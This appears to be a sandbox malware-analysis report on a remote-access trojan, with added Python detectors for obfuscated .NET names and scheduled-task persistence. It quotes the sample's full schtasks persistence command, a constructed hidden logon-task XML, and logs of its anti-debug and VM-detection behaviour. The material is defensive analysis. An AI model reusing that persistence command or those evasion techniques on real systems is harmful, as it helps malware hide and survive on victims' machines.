Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, VqLmSH7RgWutvICVLi.cs High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, NlIU2cH69ja9orLXPY.cs High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, nSqupc9RcXrL7kCSMd6.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, mfRvrEiV6LkHavWeTs.cs High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, r0BndIovQnfinH7bOK.cs High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, O44hq2QsnAk4t8sf0X.cs High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, cPUaQKVh22uqMAgfdU.cs High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, gZ55u8jUyfNBIrR6uM.cs High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, pDACUWT7QZRt25nZDm.cs High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
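The "High entropy of concatenated method names" entries above come from a simple statistical test on the decompiled .NET classes: join the method names of one class and measure how random the resulting string looks. The following Python is an added example that reproduces that test; it is not Joe Sandbox code. The obfuscated name list is copied from the report entries above, the benign comparison list and the 4.7 bits/char threshold are assumptions for illustration, and the digit-ratio check is an extra signal not mentioned in the report.

```python
"""Reproduce the 'high entropy of concatenated method names' heuristic.

Added example, not Joe Sandbox code. It joins the method names of one decompiled
.NET class into a single string and measures Shannon entropy per character;
renaming obfuscators that emit random mixed-case/digit identifiers push this well
above what English-like names produce. THRESHOLD_BITS is an assumption chosen for
illustration, not the sandbox's real cut-off.
"""
import math
from collections import Counter

THRESHOLD_BITS = 4.7  # assumption: illustrative cut-off, not the sandbox's value

# Method names copied from the report for three classes of the 70d0000.5 dump,
# with the legitimate overrides (CanConvertFrom, ToString, ...) left out
OBFUSCATED_NAMES = [
    "KaShH8is3H", "Eb3hW590A1", "NA8hxljjek", "XxVhwtXOxK", "lUAhsXuwWK",
    "U7ThoKQo6Z", "tPdhPxUa6X",
    "h3jr5oynwX", "UvPrGQVyel", "kBCrcQEaKO", "UhYrJ7vYLa", "UbKrgtsx7A",
    "soTr2A0Ktb", "UlPr3MulmH", "AhPrOIOMyd", "gQwrTnjEM0",
    "nG0I9hyZnM", "vwyIR4wei4", "lvtIQLDPwo", "HMaImurevG",
]

# Constructed comparison set of ordinary .NET member names (not from the report)
BENIGN_NAMES = [
    "CanConvertFrom", "ConvertFrom", "ConvertTo", "ToString", "Dispose",
    "Equals", "GetHashCode", "GetType", "Next", "NextBytes",
]


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of text (0.0 for an empty string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names) -> float:
    """Entropy of all method names of one class joined into one string."""
    return shannon_entropy("".join(names))


def digit_ratio(names) -> float:
    """Fraction of names containing a digit: a secondary signal, since most
    hand-written .NET member names (ToInt32 aside) carry none."""
    if not names:
        return 0.0
    return sum(any(ch.isdigit() for ch in n) for n in names) / len(names)


def is_obfuscated(names, threshold: float = THRESHOLD_BITS) -> bool:
    """Flag a class whose joined method names exceed the entropy threshold."""
    return method_name_entropy(names) > threshold


def score_classes(classes: dict) -> dict:
    """Map class name -> (entropy, digit ratio, flagged) for {class: [names]}."""
    return {
        cls: (round(method_name_entropy(n), 2), round(digit_ratio(n), 2), is_obfuscated(n))
        for cls, n in classes.items()
    }


if __name__ == "__main__":
    results = score_classes({
        "report (obfuscated)": OBFUSCATED_NAMES,
        "constructed (benign)": BENIGN_NAMES,
    })
    for cls, (h, d, flagged) in results.items():
        print(f"{cls:24} {h:.2f} bits/char  digits={d:.2f}  {'FLAG' if flagged else 'ok'}")
```

Classes that override framework members keep a few readable names (CanConvertFrom, ToString, Next) next to the renamed ones, which is why the report lists both; the entropy of the joined string still separates them from ordinary code, but on very short classes (two or three methods) the estimate is noisy and a per-class threshold alone will misfire.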
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
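The schtasks line above is the persistence mechanism behind the "Scheduled temp file as task from temp location" signature: the sample writes a task definition to %TEMP% and registers it under the Updates\ folder so the dropped KfYvtUBOq.exe runs again after reboot. The Python below is an added example, not Joe Sandbox or Sigma code, that flags such a command line and then inspects a task definition the way a responder would after collecting it from C:\Windows\System32\Tasks. The task XML it parses is constructed to match the task name and dropped file seen in the report; the report does not show the task body, so its logon trigger and hidden flag are assumptions, as is the "user-writable path plus logon trigger or hidden flag" rule.

```python
"""Scheduled-task persistence: flag the schtasks command line and inspect the task.

Added example, not Joe Sandbox or Sigma code. flag_schtasks_cmdline() applies the
logic behind the 'Scheduled temp file as task from temp location' signature to a
process-creation command line; analyze_task_xml() inspects a task definition the
way a responder does after pulling it from C:\\Windows\\System32\\Tasks. The task
XML below is constructed to match the report's task name and dropped file; the
report does not show the task body, so its triggers and settings are assumptions.
"""
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Command line as recorded in the report
REPORT_CMDLINE = (r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" '
                  r'/XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"')

TEMP_DIRS = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local)\\|\\Users\\Public\\|\\ProgramData\\", re.I)
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def flag_schtasks_cmdline(cmdline: str) -> Optional[dict]:
    """Return task name and XML path when a task is created from a temp-location
    XML, otherwise None. Case-insensitive because schtasks accepts any case."""
    if not re.search(r'schtasks(\.exe)?"?\s', cmdline, re.I):
        return None
    if not re.search(r"/create\b", cmdline, re.I):
        return None
    m_xml = re.search(r'/xml\s+"?([^"\s]+)"?', cmdline, re.I)
    if m_xml is None or not TEMP_DIRS.search(m_xml.group(1)):
        return None
    m_tn = re.search(r'/tn\s+"?([^"\s]+)"?', cmdline, re.I)
    return {"task_name": m_tn.group(1) if m_tn else None, "xml": m_xml.group(1)}


# Constructed task body (assumption) consistent with the report's /TN and dropped
# file. Real task files are UTF-16 with an XML declaration; omitted here so the
# string parses directly.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Settings>
    <Hidden>true</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\KfYvtUBOq.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def analyze_task_xml(xml_text: str) -> dict:
    """Extract the action command, hidden flag and trigger types from a task
    definition and decide whether it looks like user-land persistence (rule is
    an assumption: executable under a user-writable path plus a logon trigger
    or the hidden flag)."""
    root = ET.fromstring(xml_text)
    cmd_el = root.find("t:Actions/t:Exec/t:Command", TASK_NS)
    command = (cmd_el.text or "").strip() if cmd_el is not None else ""
    hidden_el = root.find("t:Settings/t:Hidden", TASK_NS)
    hidden = hidden_el is not None and (hidden_el.text or "").strip().lower() == "true"
    trig_parent = root.find("t:Triggers", TASK_NS)
    triggers = [] if trig_parent is None else [t.tag.split("}")[-1] for t in trig_parent]
    user_writable = bool(USER_WRITABLE.search(command))
    return {
        "command": command,
        "hidden": hidden,
        "triggers": triggers,
        "user_writable": user_writable,
        "suspicious": user_writable and (hidden or "LogonTrigger" in triggers),
    }


if __name__ == "__main__":
    print(flag_schtasks_cmdline(REPORT_CMDLINE))
    print(analyze_task_xml(SAMPLE_TASK_XML))
```

Two details worth knowing when hunting for this on a live host: the command line names C:\Windows\System32\schtasks.exe but the process actually created is the SysWOW64 copy, because the 32-bit sample is subject to file-system redirection, so match on the image name rather than the full path; and the registered task survives as C:\Windows\System32\Tasks\Updates\KfYvtUBOq even after the tmp89CA.tmp source file is gone, which is the copy to collect.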

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process information set: NOOPENFILEERRORBOX (44 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (103 identical entries)
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 2B59904 second address: 2B5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 2B59B7E second address: 2B59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 2999904 second address: 299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 2999B7E second address: 2999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: 2B60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: 8D00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: 9D00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: 9F00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Memory allocated: AF00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory allocated: 12C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory allocated: 2D50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory allocated: 8640000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Memory allocated: 9640000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E0D0 rdtsc 7_2_0112E0D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2808
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4277
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5651
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 890
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 858
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 9652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 1.6 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 1.9 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe TID: 5332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe TID: 6332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 3300 Thread sleep count: 4277 > 30
Source: C:\Windows\explorer.exe TID: 3300 Thread sleep time: -8554000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3300 Thread sleep count: 5651 > 30
Source: C:\Windows\explorer.exe TID: 3300 Thread sleep time: -11302000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332 Thread sleep count: 319 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332 Thread sleep time: -638000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332 Thread sleep count: 9652 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332 Thread sleep time: -19304000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000009.00000000.2154297535.00000000097F3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000009.00000002.4578457861.0000000009605000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2163252366.0000000008C55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E0D0 rdtsc 7_2_0112E0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01172B60 LdrInitializeThunk, 7_2_01172B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_007225B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 15_2_007225B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01160124 mov eax, dword ptr fs:[00000030h] 7_2_01160124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112C156 mov eax, dword ptr fs:[00000030h] 7_2_0112C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h] 7_2_01136154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132140 mov ecx, dword ptr fs:[00000030h] 7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132140 mov eax, dword ptr fs:[00000030h] 7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01172160 mov eax, dword ptr fs:[00000030h] 7_2_01172160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h] 7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h] 7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01170185 mov eax, dword ptr fs:[00000030h] 7_2_01170185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0118E1D8 mov eax, dword ptr fs:[00000030h] 7_2_0118E1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h] 7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h] 7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h] 7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE1D0 mov ecx, dword ptr fs:[00000030h] 7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011601F8 mov eax, dword ptr fs:[00000030h] 7_2_011601F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h] 7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4000 mov ecx, dword ptr fs:[00000030h] 7_2_011B4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112C020 mov eax, dword ptr fs:[00000030h] 7_2_0112C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A020 mov eax, dword ptr fs:[00000030h] 7_2_0112A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132050 mov eax, dword ptr fs:[00000030h] 7_2_01132050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6050 mov eax, dword ptr fs:[00000030h] 7_2_011B6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01192045 mov eax, dword ptr fs:[00000030h] 7_2_01192045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115C073 mov eax, dword ptr fs:[00000030h] 7_2_0115C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A060 mov eax, dword ptr fs:[00000030h] 7_2_0116A060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113208A mov eax, dword ptr fs:[00000030h] 7_2_0113208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011280A0 mov eax, dword ptr fs:[00000030h] 7_2_011280A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B20DE mov eax, dword ptr fs:[00000030h] 7_2_011B20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112C0F0 mov eax, dword ptr fs:[00000030h] 7_2_0112C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011720F0 mov ecx, dword ptr fs:[00000030h] 7_2_011720F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A0E3 mov ecx, dword ptr fs:[00000030h] 7_2_0112A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011380E9 mov eax, dword ptr fs:[00000030h] 7_2_011380E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B60E0 mov eax, dword ptr fs:[00000030h] 7_2_011B60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01150310 mov ecx, dword ptr fs:[00000030h] 7_2_01150310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112C301 mov ecx, dword ptr fs:[00000030h] 7_2_0112C301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h] 7_2_0116A30B
